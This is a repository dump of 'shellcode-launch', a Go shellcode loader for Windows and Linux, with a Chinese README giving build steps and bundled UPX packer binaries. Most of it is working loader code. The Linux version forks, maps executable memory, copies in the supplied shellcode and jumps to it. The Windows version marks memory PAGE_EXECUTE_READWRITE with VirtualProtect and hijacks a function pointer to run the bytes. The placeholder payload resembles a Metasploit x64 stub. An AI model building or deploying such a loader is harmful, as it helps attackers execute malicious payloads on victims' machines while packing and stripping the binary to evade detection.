├── README.md ├── linuxlaunch.go ├── linuxshellcode └── shellcode_unix.go ├── upx64 ├── upx64.exe ├── winlaunch.go └── winshellcode └── shellcode_windows.go /README.md: -------------------------------------------------------------------------------- 1 | # go 编写 shellcode 加载器 2 | 3 | 引用 4 | > https://github.com/brimstone/go-shellcode 5 | 6 | ## 使用 7 | git clone https://github.com/jax777/shellcode-launch 8 | copy 至 $GOPATH/src 路径下 9 | ### windows 下 10 | 生成shellcode 11 | 修改 `winlaunch.go` 文件sc 变量 12 | 在当前目录打开cmd 13 | - 32 位 运行 14 | ``` 15 | set CGO_ENABLED=0 16 | set GOOS=windows 17 | set GOARCH=386 18 | go build -ldflags="-s -w" winlaunch.go 19 | ``` 20 | - 64 位 运行 win_64.bat 21 | ``` 22 | set CGO_ENABLED=0 23 | set GOOS=windows 24 | set GOARCH=amd64 25 | go build -ldflags="-s -w" winlaunch.go 26 | ``` 27 | 28 | ### linux 下 29 | 生成shellcode 30 | 修改 `linuxlaunch.go` 文件sc 变量 31 | - 32 位 运行 32 | `CGO_ENABLED=1 GOOS=linux GOARCH=386 go build -ldflags="-s -w" linuxlaunch.go` 33 | - 64 位 运行 34 | `CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" linuxlaunch.go` -------------------------------------------------------------------------------- /linuxlaunch.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "shellcode-launch/linuxshellcode" 5 | ) 6 | 7 | func main() { 8 | sc := []byte("xaa\x51") 9 | linuxshellcode.Run(sc) 10 | } 11 | -------------------------------------------------------------------------------- /linuxshellcode/shellcode_unix.go: -------------------------------------------------------------------------------- 1 | // +build linux freebsd darwin 2 | package linuxshellcode 3 | 4 | /* 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | void call(char *shellcode, size_t length) { 11 | if(fork()) { 12 | return; 13 | } 14 | unsigned char *ptr; 15 | ptr = (unsigned char *) mmap(0, length, \ 16 | PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); 17 | if(ptr == MAP_FAILED) { 18 | perror("mmap"); 19 | return; 20 | } 21 | memcpy(ptr, shellcode, length); 22 | ( *(void(*) ()) ptr)(); 23 | } 24 | */ 25 | import "C" 26 | import ( 27 | "unsafe" 28 | ) 29 | 30 | func Run(sc []byte) { 31 | C.call((*C.char)(unsafe.Pointer(&sc[0])), (C.size_t)(len(sc))) 32 | } 33 | -------------------------------------------------------------------------------- /upx64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/shellcode-launch/b9d29c0dd42ac03e82939887f50b7a667cd6cbbe/upx64 -------------------------------------------------------------------------------- /upx64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/shellcode-launch/b9d29c0dd42ac03e82939887f50b7a667cd6cbbe/upx64.exe -------------------------------------------------------------------------------- /winlaunch.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "shellcode-launch/winshellcode" 5 | ) 6 | 7 | func main() { 8 | sc := []byte("\xfc\x48\x83") 9 | winshellcode.Run(sc) 10 | } 11 | -------------------------------------------------------------------------------- /winshellcode/shellcode_windows.go: -------------------------------------------------------------------------------- 1 | package winshellcode 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect") 9 | 10 | func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool { 11 | ret, _, _ := procVirtualProtect.Call( 12 | uintptr(lpAddress), 13 | uintptr(dwSize), 14 | uintptr(flNewProtect), 15 | uintptr(lpflOldProtect)) 16 | return ret > 0 17 | } 18 | 19 | func Run(sc []byte) { 20 | // TODO need a Go safe fork 21 | // Make a function ptr 22 | f := func() {} 23 | 24 | // Change permissions on f function ptr 25 | var oldfperms uint32 26 | if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) { 27 | panic("Call to VirtualProtect failed!") 28 | } 29 | 30 | // Override function ptr 31 | **(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc)) 32 | 33 | // Change permissions on shellcode string data 34 | var oldshellcodeperms uint32 35 | if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) { 36 | panic("Call to VirtualProtect failed!") 37 | } 38 | 39 | // Call the function ptr it 40 | f() 41 | } 42 | --------------------------------------------------------------------------------